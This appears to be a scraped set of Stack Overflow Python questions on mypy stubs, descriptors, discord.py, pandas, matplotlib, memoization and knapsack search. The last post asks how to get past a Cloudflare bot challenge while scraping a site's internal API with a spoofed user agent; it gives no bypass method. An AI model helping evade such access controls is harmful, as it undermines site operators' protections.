|
Trouble making mypy and phonenumbers module work, implementation missing
|
<p>I installed python's <a href="https://pypi.org/project/phonenumbers/" rel="nofollow noreferrer"><code>phonenumbers>=3.12.32</code></a>, which should include the stub files, but when I run <code>mypy</code> it yields:</p>
<pre><code>$ mypy -m module
module.py:22: error: Cannot find implementation or library stub for module named "phonenumbers"
module.py:22: note: See https://mypy.readthedocs.io/en/stable/running_mypy.html#missing-imports
</code></pre>
<hr />
<p>I would guess that either I'm not configuring correctly mypy, because when checking the <a href="https://github.com/daviddrysdale/python-phonenumbers/tree/dev/python/phonenumbers" rel="nofollow noreferrer">project, the <code>*.pyi</code> files are there</a>, also when checking the installation of the <code>phonenumbers</code> module <code>venv/lib/python3.11/site-packages/phonenumbers</code>, I see that the <code>*.pyi</code> files are present.</p>
<p>Any thoughts on how to make it work?</p>
|
<python><mypy><python-typing>
|
2023-05-22 02:51:24
| 0
| 840
|
ekiim
|
76,302,654
| 2,326,961
|
Why does property override object.__getattribute__?
|
<p>I noticed that contrary to the <code>classmethod</code> and <code>staticmethod</code> decorators, the <code>property</code> decorator overrides the <code>object.__getattribute__</code> method:</p>
<pre class="lang-py prettyprint-override"><code>>>> list(vars(classmethod))
['__new__', '__repr__', '__get__', '__init__', '__func__', '__wrapped__', '__isabstractmethod__', '__dict__', '__doc__']
>>> list(vars(staticmethod))
['__new__', '__repr__', '__call__', '__get__', '__init__', '__func__', '__wrapped__', '__isabstractmethod__', '__dict__', '__doc__']
>>> list(vars(property))
['__new__', '__getattribute__', '__get__', '__set__', '__delete__', '__init__', 'getter', 'setter', 'deleter', '__set_name__', 'fget', 'fset', 'fdel', '__doc__', '__isabstractmethod__']
</code></pre>
<p>The functionality of the <code>property</code> decorator doesn’t seem to require this override (cf. the equivalent Python code in the <a href="https://docs.python.org/3/howto/descriptor.html#properties" rel="nofollow noreferrer">Descriptor HowTo Guide</a>). So which behaviour exactly does this override implement? Please provide a link to the corresponding C code in the <a href="https://github.com/python/cpython" rel="nofollow noreferrer">CPython repository</a>, and optionally an equivalent Python code.</p>
|
<python><python-descriptors>
|
2023-05-22 02:00:35
| 1
| 8,424
|
Géry Ogam
|
76,302,642
| 7,530,306
|
discord.py: sys:1: RuntimeWarning: coroutine 'Loop._loop' was never awaited
|
<pre><code>Traceback (most recent call last):
File "bot.py", line 55, in <module>
send_cal.start()
File "python3.8/site-packages/discord/ext/tasks/__init__.py", line 398, in start
self._task = asyncio.create_task(self._loop(*args, **kwargs))
File "/usr/local/Cellar/python@3.8/3.8.16/Frameworks/Python.framework/Versions/3.8/lib/python3.8/asyncio/tasks.py", line 381, in create_task
loop = events.get_running_loop()
RuntimeError: no running event loop
sys:1: RuntimeWarning: coroutine 'Loop._loop' was never awaited
</code></pre>
<p>I get the above traceback with this code for my bot</p>
<pre><code>@tasks.loop(seconds=20.0)
async def send_cal():
message_channel = bot.get_channel(target_channel_id)
print(f"Got channel {message_channel}")
df = await someApi()
df = df.drop(['stuff'], axis=1)
csv = df.to_csv(header=False, index=False)
res = csv.replace(',', ' ----> ')
if (len(res)) >= 2000:
await message.channel.send('result over 2000 chars')
await message.channel.send(res)
@send_cal.before_loop
async def before():
await client.wait_until_ready()
print("Finished waiting")
send_cal.start()
client.run('mytoken')
</code></pre>
<p>I can't figure out why <code>send_cal</code> would never be awaited. I see in examples the same setup, where <code>.start()</code> kicks off the job and i assume asyncio is awaiting it under the hood, however i haven't been able to figure out why this is happening otherwise</p>
<p>edit: I am really just copying the starter guide here <a href="https://discordpy.readthedocs.io/en/latest/ext/tasks/index.html" rel="nofollow noreferrer">https://discordpy.readthedocs.io/en/latest/ext/tasks/index.html</a></p>
|
<python><discord><python-asyncio>
|
2023-05-22 01:56:52
| 1
| 665
|
sf8193
|
76,302,550
| 1,469,208
|
Replace space with a random character (there and back) in Python
|
<h2>The problem</h2>
<p>I have a <em>haystack</em>:</p>
<pre><code>source = ''' "El Niño" "Hi there! How was class?"
"Me" "Good..."
"I can't bring myself to admit that it all went in one ear and out the other."
"But the part of the lesson about writing your own résumé was really interesting!"
"Me" "Are you going home now? Wanna walk back with me?"
"El Niño" "Sure!"'''
</code></pre>
<p>I have a <em>mask</em>:</p>
<pre><code>out_table = '→☺☻♥♦♣♠•◘○§¶▬↨↑↓←∟↔'
</code></pre>
<p>And I have a <em>token</em> -- <code> </code> (single space).</p>
<p>All their elements are <em>strings</em> (<code>class of <str></code>).</p>
<p>I need a function that will:</p>
<ol>
<li>Iterate through <em>haystack</em> (<code>source</code>)</li>
<li>Replace each occurrence of <em>token</em> (<code> </code>) with a <em>single character</em> <strong>randomly picked</strong> from the <em>mask</em></li>
<li>Will print resulting <em>new haystack</em> after the replacement process</li>
</ol>
<p>Finally, I need a similar method that will revert the above process, so it will replace each occurrence (every character) of the <code>→☺☻♥♦♣♠•◘○§¶▬↨↑↓←∟↔</code> list into <code> </code> (space).</p>
<h2>Expected result</h2>
<p>An example (can vary -- randomness) example result is (just a printout):</p>
<pre><code>↔◘↔▬"El→Niño"↓"Hi∟there!↓How↨was↨class?"
↔◘↔▬"Me"↓"Good..."
♥♦♣♠"I↓can't↨bring§myself↓to∟admit↓that↓it↓all↓went↓in↓one§ear↓and↓out§the↓other."
↔◘↔▬"But☻the☻part☻of↓the→lesson∟about↓writing↓own↓résumé§was§really→interesting!"
↔◘↔▬"Me"↓"Are↓you☻going↓home§now?→Wanna↓walk∟back↓with↓me?"
♥♦♣♠"El↓Niño"→"Sure!"
</code></pre>
<p>Assumptions:</p>
<ul>
<li><strong>Every</strong> space must be replaced in the <em>haystack</em></li>
<li><strong>Not every</strong> character out of <em>mask</em> must be used</li>
</ul>
<p>So, I the most "randomly border" scenario <em>all</em> spaces will be replaced with <em>the same</em> character. Which isn't a problem at all as long as the whole process is reversible back to the original <em>haystack</em> (<code>source</code>).</p>
<h2>My research and solution attempt</h2>
<p>Since this is my first Python code, I have browsed a number of <a href="https://stackoverflow.com/questions/34338788/python-replace-3-random-characters-in-a-string-with-no-duplicates">Python</a> and <a href="https://stackoverflow.com/a/34800817/1469208">non-Python</a> related <a href="https://stackoverflow.com/q/32119073/1469208">questions</a> here and in <a href="https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.replace.html" rel="nofollow noreferrer">the net</a> and I have come with the following idea:</p>
<pre><code>import random
def swap_charcter(message, character, mask):
the_list = list(message)
for i in random.sample(range(len(the_list)), len(list(mask))):
the_list[i] = random.choice(mask)
return message.join(the_list)
# print(swap_charcter('tested', 'e', '!#'))
print(swap_charcter('tested', 'e','→☺☻♥♦♣♠•◘○§¶▬↨↑↓←∟↔'))
</code></pre>
<p>But... I must be doing something wrong, because each time I run this (or many, many other) piece of code with just a space as an argument, I am getting the <em>Sample larger than population or is negative</em> error.</p>
<p>Can someone help here a little bit? Thank you.</p>
<p><strong>EDIT</strong>: <em>I have replaced <code>list(character)</code> → <code>list(message)</code>, as suggested in the comments</em>.</p>
|
<python><replace><unicode><space>
|
2023-05-22 01:13:47
| 2
| 17,573
|
trejder
|
76,302,435
| 5,212,614
|
How can we merge column headers from multiple CSVs into one dataframe, and list source file names for each file in one column?
|
<p>Here is the code that I am testing.</p>
<pre><code># import necessary libraries
import pandas as pd
import os
import glob
# use glob to get all the csv files
# in the folder
path = 'C:\\Users\\'
csv_files = glob.glob(os.path.join(path, "*.csv"))
csv_files
df_headers = pd.DataFrame()
# loop over the list of csv files
for f in csv_files:
#print(type(f))
# read the csv file
df = pd.read_csv(f, nrows=1)
print(df.shape)
df_headers = pd.concat([df_headers, df], axis=0)
df_headers['file_name'] = f
df_headers.to_csv('C:\\Users\\ryans\\Desktop\\out.csv')
</code></pre>
<p>This almost works, but it always writes the last file to the column in df_headers['file_name'], so only the last file that the loop goes through, is actually listed in 'file_name'.</p>
|
<python><python-3.x><pandas><dataframe><loops>
|
2023-05-22 00:26:18
| 1
| 20,492
|
ASH
|
76,302,219
| 2,840,680
|
Modify the legend placement of a figure
|
<p>I am using a package program that return me a <code>matplotlib.figure</code> object together with a legend. I want to change the bounding box and placement of the legend. After checking <a href="https://matplotlib.org/stable/api/figure_api.html" rel="nofollow noreferrer">https://matplotlib.org/stable/api/figure_api.html</a> I tried to retrieve the legend as follows:</p>
<pre><code>ax = f.axes[0]
lgd_f = f.legend()
lgd = ax.get_legend_handles_labels()
print(lgd_f)
print(lgd)
ax.get_legend().set_bbox_to_anchor((1, 1.05))
ax.legend(bbox_to_anchor=(1, 1.05), loc=8)
</code></pre>
<p>However, this did not work as expected as calling the <code>get_legend_handles_labels</code> method on the axes returns two empty lists. Unfortunately it is not possible to modify the internals of the package program. Assuming this is possible could you point me in the right direction?</p>
|
<python><matplotlib><legend>
|
2023-05-21 22:44:18
| 1
| 785
|
Vesnog
|
76,302,191
| 9,506,773
|
What to tests in ci run vs pytest, and why
|
<p>I have a python repo in github. If I understood it correctly there are mainly two ways in which tests can be automated:</p>
<ul>
<li>using <code>run</code> in a <code>ci.yml</code> file</li>
<li>using <code>test_...</code> files under a folder called <code>test</code> (at root level) and then execute them in the ci pipeline by running <code>pytest tests</code></li>
</ul>
<p>What type of tests are more suitable for each of these options? And why?</p>
|
<python><github><testing><pip><continuous-integration>
|
2023-05-21 22:32:21
| 1
| 3,629
|
Mike B
|
76,302,149
| 9,352,077
|
imshow with twinx that is also aligned with tiles
|
<p>There <a href="https://stackoverflow.com/questions/48255824/matplotlib-imshow-with-second-y-axis">is a thread</a> where the question was to add an automatically labelled <code>twinx</code> to Matplotlib's <code>imshow</code>. The result was:</p>
<p><a href="https://i.sstatic.net/50zmU.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/50zmU.png" alt="" /></a></p>
<p>However, I would like the ticks on the second y-axis to be 1. manually settable and 2. aligned with the other ticks. Example output drawn in Paint:</p>
<p><a href="https://i.sstatic.net/VDB8R.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/VDB8R.png" alt="" /></a></p>
<p><em>Furthermore, I want to stretch the grid tiles so that the entire grid becomes a <strong>square</strong>, by using the <code>imshow</code> argument <code>aspect=4/8</code>.</em></p>
<p>If you set the aspect ratio and follow <a href="https://stackoverflow.com/a/45446097/9352077">this thread</a>, you get extra whitespace around the graph like in <a href="https://github.com/matplotlib/matplotlib/issues/1789/" rel="nofollow noreferrer">this thread</a>. Both of them claim that the solution is to use <code>set_adjustable('box-forced')</code>, but this seems to have been removed. When I try it, Matplotlib says</p>
<pre><code>ValueError: 'box-forced' is not a valid value for adjustable; supported values are 'box', 'datalim'
</code></pre>
<p>When I try <code>box</code>, I get:</p>
<pre><code>RuntimeError: Adjustable 'box' is not allowed in a twinned Axes; use 'datalim' instead
</code></pre>
<p>And using <code>datalim</code>, the white space is not removed. How do you do this in 2023?</p>
|
<python><matplotlib><imshow><twinx><yticks>
|
2023-05-21 22:17:12
| 1
| 415
|
Mew
|
76,301,901
| 1,259,561
|
Why does timeit results in almost constant time for all memoization runs?
|
<p>We compute the Fibonacci number:</p>
<pre class="lang-py prettyprint-override"><code>def fibo_memo(i, memo={}):
if i <= 0:
return 0
elif i == 1:
return 1
elif i in memo:
return memo[i]
else:
memo[i] = fibo_memo(i-2, memo) + fibo_memo(i-1, memo)
return memo[i]
def fibo_dp(i):
if i <= 0:
return 0
elif i == 1:
return 1
dp = [0] * (i + 1)
dp[1] = 1
for j in range(2, i + 1):
dp[j] = dp[j-1] + dp[j-2]
return dp[i]
assert(fibo_memo(100) == fibo_dp(100))
</code></pre>
<p>Now time it:</p>
<pre><code>i = 10
%timeit fibo_memo(i) # 73 ns
%timeit fibo_dp(i) # 309 ns
i = 100
%timeit fibo_memo(i) # 73 ns
%timeit fibo_dp(i) # 2.54 micro seconds
i = 1000
%timeit fibo_memo(i) # 73 ns
%timeit fibo_dp(i) # 33 micro seconds
</code></pre>
<p>Why does memoization result in almost constant time, unlike dynamic programming?</p>
|
<python><performance><dynamic-programming><memoization>
|
2023-05-21 20:59:51
| 1
| 3,659
|
THN
|
76,301,828
| 3,482,266
|
How to set a Pydantic field value depending on other fields
|
<pre class="lang-py prettyprint-override"><code>from pydantic import BaseModel
class Grafana(BaseModel):
user: str
password: str
host: str
port: str
api_key: str | None = None
GRAFANA_URL = f"http://{user}:{password}@{host}:{port}"
API_DATASOURCES = "/api/datasources"
API_KEYS = "/api/auth/keys"
</code></pre>
<p>With Pydantic I get two unbound variables error messages for <code>user</code>, <code>password</code>, etc. in <code>GRAFANA_URL</code>.</p>
<p>Is there a way to solve this? In a regular class, I would just create <code>GRAFANA_URL</code> in the <code>__init__</code> method. With Pydantic, I'm not sure how to proceed.</p>
|
<python><pydantic>
|
2023-05-21 20:35:57
| 1
| 1,608
|
An old man in the sea.
|
76,301,807
| 12,144,502
|
Comparison of BFS and DFS algorithm for the Knapsack problem
|
<p>I am fairly new to python and I have a task which tells me to compare both algorithm time expended and space used in memory.</p>
<p>I have coded both algorithms and ran them both. I was able to measure the time used, but wasnt able to look for ways to know how much space was used. I am also not sure if the question is asking me to calculate it based on general BFS and DFS or the code I have coded.</p>
<blockquote>
<p>Comparison of the time expended by the algorithms.</p>
<p>Comparison of the space used in memory at a time by the algorithms</p>
</blockquote>
<p>To get the time I used <code>start_time = time.time()</code> and <code>end = time.time()</code></p>
<pre><code>BFS algorithm
0.0060007572174072266s
DFS algorithm
0.005002260208129883s
</code></pre>
<p>How would I calculate the space used in memory assuming that it is based on my code. I might be just confused but the wording of the question makes me feel like I need to measure it when running both algorithms to compare the performance.</p>
<hr />
<p><strong>Code</strong>:</p>
<p><em>BFS</em> :</p>
<pre><code>def knapsack_bfs(items, max_weight):
queue = deque()
root = Node(-1, 0, 0, [])
queue.append(root)
max_benefit = 0
best_combination = []
while queue:
current = queue.popleft()
if current.level == len(items) - 1:
if current.benefit > max_benefit:
max_benefit = current.benefit
best_combination = current.items
else:
next_level = current.level + 1
next_item = items[next_level]
include_benefit = current.benefit + next_item.benefit
include_weight = current.weight + next_item.weight
if include_weight <= max_weight:
include_node = Node(next_level, include_benefit,
include_weight, current.items + [next_item.id])
if include_benefit > max_benefit:
max_benefit = include_benefit
best_combination = include_node.items
queue.append(include_node)
exclude_node = Node(next_level, current.benefit,
current.weight, current.items)
queue.append(exclude_node)
return max_benefit, best_combination
</code></pre>
<p><em>DFS</em>:</p>
<pre><code>def knapsack_dfs(items, max_weight):
queue = []
root = Node(-1, 0, 0, [])
queue.append(root)
max_benefit = 0
best_combination = []
while queue:
current = queue.pop()
if current.level == len(items) - 1:
if current.benefit > max_benefit:
max_benefit = current.benefit
best_combination = current.items
else:
next_level = current.level + 1
next_item = items[next_level]
include_benefit = current.benefit + next_item.benefit
include_weight = current.weight + next_item.weight
if include_weight <= max_weight:
include_node = Node(next_level, include_benefit,
include_weight, current.items + [next_item.id])
if include_benefit > max_benefit:
max_benefit = include_benefit
best_combination = include_node.items
queue.append(include_node)
exclude_node = Node(next_level, current.benefit,
current.weight, current.items)
queue.append(exclude_node)
return max_benefit, best_combination
</code></pre>
<p>Edit:</p>
<p>Results based on the answer below:</p>
<pre><code>program.py:42: size=4432 B (+840 B), count=79 (+15), average=56 B
program.py:116: size=0 B (-768 B), count=0 (-1)
program.py:79: size=0 B (-744 B), count=0 (-13)
program.py.py:85: size=0 B (-72 B), count=0 (-1)
program.py:57: size=0 B (-56 B), count=0 (-1)
program.py:56: size=0 B (-56 B), count=0 (-1)
program.py:74: size=0 B (-32 B), count=0 (-1)
program.py:37: size=32 B (+0 B), count=1 (+0), average=32 B
</code></pre>
|
<python><python-3.x><algorithm><knapsack-problem>
|
2023-05-21 20:28:39
| 1
| 400
|
zellez11
|
76,301,728
| 7,533,650
|
Getting around "Enable JavaScript and cookies to continue" error when web scraping w/ Python
|
<p>I recently wrote a script to scrape the front-end of a website, but recently have run into issues with enabling Javascript and cookies so I can pull the data. I'm not sure if this is a new captcha that was implemented, but have made several attempts at getting around this error, as shown below:</p>
<pre><code>Traceback (most recent call last):
File "/opt/homebrew/lib/python3.9/site-packages/requests/models.py", line 910, in json
return complexjson.loads(self.text, **kwargs)
File "/opt/homebrew/lib/python3.9/site-packages/simplejson/__init__.py", line 525, in loads
return _default_decoder.decode(s)
File "/opt/homebrew/lib/python3.9/site-packages/simplejson/decoder.py", line 370, in decode
obj, end = self.raw_decode(s)
File "/opt/homebrew/lib/python3.9/site-packages/simplejson/decoder.py", line 400, in raw_decode
return self.scan_once(s, idx=_w(s, idx).end())
simplejson.errors.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/user/Desktop/Scripts/scrape/untitled.py", line 21, in <module>
data = DuneData('01GZ9A6BJ85ZJSQWVG2RVXY2XJ',188664)
File "/Users/user/Desktop/Scripts/scrape/untitled.py", line 16, in DuneData
data = requests.post(api_url, json=payload, headers=headers).json()
File "/opt/homebrew/lib/python3.9/site-packages/requests/models.py", line 917, in json
raise RequestsJSONDecodeError(e.msg, e.doc, e.pos)
requests.exceptions.JSONDecodeError: [Errno Expecting value] <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7caf65968a49e71a')"></div>
<form id="challenge-form" action="/v1/graphql?__cf_chl_f_tk=blBqvLjLbA8FPaIGpKKwah.JvllhTMlA.UhXCSc1XXs-1684699134-0-gaNycGzNDPs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="295Z8glK_610pCxAx3lV2daoYOQlQfzgh9M8J.xym9Q-1684699134-0-AYkSDJTle9beyLVvfmcSmQFGxQJa_7grQNKxDDtnS3Uk3LAzUVM0pGZldf1kAk0588IkaC4OxYsJktXypW8XxQuvLNh4i5A5s-jvQ8PLTd2GDCy2ICGwmMKEmZE2L29YLKvea2XdHC_2KfLGehRoOi9ZuVHOPj6OD75anQdCnFWacAH1Rtn5w9HBtFz_aIxardEYmJ2jpeCisFBFfYpq23uX29XMmyGJPpIXV3186PZMlyFyGT9Ho3E5JIL-sICGvzDjZThj-Z7MCkH4qIAip85TBQPWz2rg0MSteZ7ivlq_vFZ6pgBkcuW2fvDYRRFRchjtezQ7bA1O3CavYjses5IiU7UwO_-lgnXGZLN0NQua8x8N34WKyJfOIKf5EKaFSHqoTTFTZSt_DuAH0BtMgNUffY-XGgu7o8PA9p_l-QrHFXVYB8BOJZbA9NhYjsBk3d_hq6NzQ_T748Nbp9jofxv1NL8vykCZTgKlRgiHxu686nH55DW0rfgBWsoWU6o1JbPIJ8WuWrQES2LklH22fOVFg6YsCpQuk-9ZvvCGUT_64Q7SCJ2xrwvTXASkyuQUIwYD9-q3Ja9VVAPeVSPE0_el-4-UGL10iSw8AIubzzbwyb7Y8Ps8lWXlV5NrhIMwquLX19LWiUqPDaNnnSwTStoFYIM55HGD9rUL0FZhz_AGoJDBP5qGFE7-qR2YjyZ7R2oLQON9aR3oqz5hLIKxgK748uZ-HqX48L84v9UTZLLyaJVaKmJosTKCYhyxdXquaaxnftWP3h8alAjXfLb2dPofVOh9YZCIE8n0S0Wp4MZ7hNnSf4XT-A9vDCuJSj_3iubfaZg1rpFpzoXeARnAJYwwO3ZNsai51v5lyYmWalpHR7QzDypX99PATde6cOi_JwZouz5PanOHzgE5QZyqcf1RDR_GvoGDZPWEiy0v44saewnWtW6dg8BhxUVV9kd-n1MhW3WG-rrVgATKFst2FvVm33ULu69ff_cLa3H5Sw4fvNLSfpT5mvs57Yu9wEdj9RX9tzZAcULzOgDywwZXnkxTsZEutxCHgkcS5SWPC5CRn_4R-zLv6a2iQcl2J0igYaI35AAg0QJg1nuwltsJZPxIjM7Yyb13BhGRdtRZd6zj4CpFJB8F4EkhrTok4S08GE6Omol66xy6emsAPui-j5iOHoqKHYjECxjDKDmE4A5RpYE2NrY45m9ENtbuTN73A_gpqT0hRGsZX93QIUJJw0aCWfxxaMfdGMNUh0gQYfgRiyZpJdNDKYaaCUYX55WniybSlLkTjY_K8fVZqMLXYXE1PeMqebL04jsN6cqWP7Ch_-Ng7_zTqY_-keFgrf6Jg5Cd2SuDcMoNmXIvRIgON2BavVyawTE-c_fnpeC9p_GebCScrMIBvZf63WhEoEu-UlCWm21762jXgKptb3Y7XCelpzxTjmHumlxyzcpHKcJKR3OksTqQzTXjYC1qn52mVVO7arsZIwNXH90njhOXV_e6qOeqZsW-kmoF6NyxuY0WHuMEWesFbJstEQuYD-ni1ZyvqZpfaQwWSEMh203nh30rIK36MpfHp2O0TrIYITkoeQPZfqvAnY1st2EkfJMurJCbboJjFsPYHvV_hFORCCs6lBAjxsDUEOKBVHbIoxa9s1DtkK48UpHzHZdXASJB_5UZXgdksYV6QfFKEsbm7yaPQJxiEXxo0ZMonHT2IX7stErAZWWFOwbvfflxDAD_VeCkaMcGX2IlQiuqDfO-nNVB69jPTjYhJIBcqNN4aDUUBBKwlhQwNfpfq76w9TOZw6Xg7hE6zZpbYGLfjn2EX9W7Ei46ZrrAndKSjBqMUGYGLPoGv85WMwRnxMg-voHXWaulJzaEpKuUPhYryrRtb2v695mbcurPnZI_VcLsZ-yu1WhKLfCl_g9mvUPmNdM84Sb4zKSOVlMjdCQz899kEeYbAeES_WxSG2Qcgc3zk2P6iuqYy9heGR8xfCaqjw-xHGjSIsED8cdf9W_N6TIulV7ImQwyacAREosCu9qo7IQurdvK3oZxli0gFLCpqI3MisdhSQF9RSg3Cxp2oYoZV8Jaxbu903FQ3IM78CzgjkT78bmAKBr-i71ypKjCxgqMF2VVkiRV_aIWUm35T7hAzbXoOY51CE5xT2n0a_LYokAvQDKrsmDKb7dJ1xGjXmntZQXvakacrzBFi7dPFtxTxXoUKYAoZoZLQoh8NDLDbA4kA6IljZdc4YxtnjKineArbW3wc3U6iKb0rX4SQGoSOKxKwDf3K1i2JXUqstR_vL-1ksQr7voa29TeKgwFH-rwYDWuIy5Ny7GLu_xJM9qFEOFQ16zSgZn9NmBEdq7lJEBzmXR2ShmbffPYfssWqtw3EJMWy1Khm98X_u-cZNMYZ4pc_MfynVn8czDpgJ1VEQkNi2PezLUy7PI1lgdb2ENIE_WL2tuFhwifwJq7mUWgNzPJb9SZcMTahufMRTndZ-852vtxt-n8QzrPCJJYUjYvasqJkcrmYgyT6rINdhBFVlu2ROAyi8Z-J8_olGjU5YPL-L_JbqdBixzmGuG_OYnFLJmeuufmaY2-oCE4zcCcPFym7YC8kNjARiCWKM1P72WhvoiS_SdvbQ6sO6YklgUz9jPR1ZkxUp4_QebsA_mIWmeEAiNdgXIa8wfOiUH_bTd7IbvFYg6M59EZ_e8dv_XUEji1IE5eZpSMmhg3daPKnL6-Y-M4e6nFSX_iuq4SEk0k5GWcG9hdBScB-QQyTIanCq6o5-KfPanSsSDLH8o1-on3N5XaBktHn_Ob6gQMINNlPxziVLM-ImnM-L6dMAX2qRm1s7nvc16oUoJXaDmD-xNYEAXZAhLceZqH4zloq0EdwmjrknKITaSc3dCrmwZMBZPiTd3wEZhBg5GXSjcaxzX1QupGMkFmzqBN70ACQnumXQX-DQbvSxE_ao-sbo2dnWeOu8mdF2dcDU-1paVhEQ7eR1xdXmvF_tMyek_-uNRixMXcRcB0w59_nZ9M_inAq3bsslAKCoJUSwRAhngChQdE209MtX8sSbbueh2tSCbRXCTL0cLho4s8pQ6gYIWklvgHzUDW4ZuXt8HfDdXnAPbeFxQ4aZRu9sLVJ4Tc06p7lyiXmjoKMsFc68_eqHAtlNUpY2V20ayVzZ4cje1_Se_WIF23SvhtMVBpAC8KFqIgR5DB8_sgVC_y3kU8Booh50OmxzVDA7jvp6loiKbwg12pWhzS2LAjBE85-qAWXn55jtV4rKLs9uYhVaWOfkozhw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'app-api.dune.com',
cType: 'managed',
cNounce: '65522',
cRay: '7caf65968a49e71a',
cHash: '6c4060ac4ff2016',
cUPMDTk: "\/v1\/graphql?__cf_chl_tk=blBqvLjLbA8FPaIGpKKwah.JvllhTMlA.UhXCSc1XXs-1684699134-0-gaNycGzNDPs",
cFPWv: 'g',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9hcHAtYXBpLmR1bmUuY29tL3YxL2dyYXBocWw=',
ra: 'TW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTFfNSkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzUwLjAuMjY2MS4xMDIgU2FmYXJpLzUzNy4zNg==',
rm: 'UE9TVA==',
d: 'UAzhxxUCtDccqA6vMBsg/7niq6oMPgbOVdY+iNzuAUS6ZmcPyjtmDmyI0xUwFKNjzJlY3YrrTM1yWC2sBHNMyk1uv84QzxvlhN9yKm4XWbzE9BK7Z7TXo8KsbuxhDx1fYR71mDg3XJgKiHE657DJNkhLl9fVOxlxuLhxa8pNiEk4KfYNM3mYzltrTnhqQflGJj9QQRIumAheW/gX2RnZtOV/6i5RnT7C9xku3MXKhs4yq0FWPTRODVE4W/7WC3+YqQhQqqsXx/UPZWLkvlEyw3UHS4azv1L3TFLLC6cyCyJLE6xyfd9Rqvgdo9+bTxzHgbNdFllwSTKLBVUemRPg+NSjr+nVLpt1o99Sr6VNETp1ngYFHrwvAf1aeGYTl934DVJo9Qgb+ae2Lw4wvgTbIe5/B6GBq034Fdk/EtDurH7RTp02ZOBL1ur2Xc2XK4mH7IJyDwVpHV8Hbevbcu0iQR5isfkKZ8+Ix1RpzB4QTvQPjm1x2EQZdQkdcmMhxypGLgNlukO+IVD7n8Re0jmbuOqsFH5NreWU+zQTwGGPKjztbiN52EqsrYKz70XExXAi6NZxDQBVwanJKdcygxs4Txw69hyclRTWPd2nDwPrFTRTTE9nd3EGk8kTCLXxsipW',
t: 'MTY4NDY5OTEzNC40ODYwMDA=',
m: 'M8BdHRfTrOf1LRwcXamVDQjRvhPG/MZcC1/YvCerKWM=',
i1: 'KAhWT5sfGsmG/7wBM0w6HA==',
i2: 'PblavcYHIGXiH36OyaJAng==',
zh: 'GMVzRUL66vF6Z+RS/U7IfESF77Uae1L4u0J3S5ERVB8=',
uh: 'MJnL4yXqlDXgoEFDXJrrYdndq9vyeF7u7u/p5sDi8wY=',
hh: '5gwOidb9xMEjxVD8VFukAZuTqZw/xQPgB7PhXIdMr9A=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7caf65968a49e71a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/g/orchestrate/managed/v1?ray=7caf65968a49e71a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/v1\/graphql?__cf_chl_rt_tk=blBqvLjLbA8FPaIGpKKwah.JvllhTMlA.UhXCSc1XXs-1684699134-0-gaNycGzNDPs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
: 0
</code></pre>
<p>Anyone have suggestions, thoughts, or ideas? My code is down below.</p>
<pre><code>import requests
import pandas as pd
from bs4 import BeautifulSoup
def DuneData(execution_id, query_id):
api_url = "https://app-api.dune.com/v1/graphql"
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
payload = {
"operationName": "GetExecution",
"query": "query GetExecution($execution_id: String!, $query_id: Int!, $parameters: [Parameter!]!) {\n get_execution(\n execution_id: $execution_id\n query_id: $query_id\n parameters: $parameters\n ) {\n execution_queued {\n execution_id\n execution_user_id\n position\n execution_type\n created_at\n __typename\n }\n execution_running {\n execution_id\n execution_user_id\n execution_type\n started_at\n created_at\n __typename\n }\n execution_succeeded {\n execution_id\n runtime_seconds\n generated_at\n columns\n data\n __typename\n }\n execution_failed {\n execution_id\n type\n message\n metadata {\n line\n column\n hint\n __typename\n }\n runtime_seconds\n generated_at\n __typename\n }\n __typename\n }\n}\n",
"variables": {
"execution_id": execution_id,
"parameters": [],
"query_id": query_id}}
data = requests.post(api_url, json=payload, headers=headers).json()
df = pd.DataFrame(data["data"]["get_execution"]["execution_succeeded"]["data"])
return(df)
data = DuneData('01GZ9A6BJ85ZJSQWVG2RVXY2XJ',188664)
dates = data['date'].tolist()
dates = [x.split('T')[0] for x in dates]
loans = data['Total Value Locked'].tolist()
print(dates, loans)
</code></pre>
|
<python><python-3.x><web-scraping><python-requests>
|
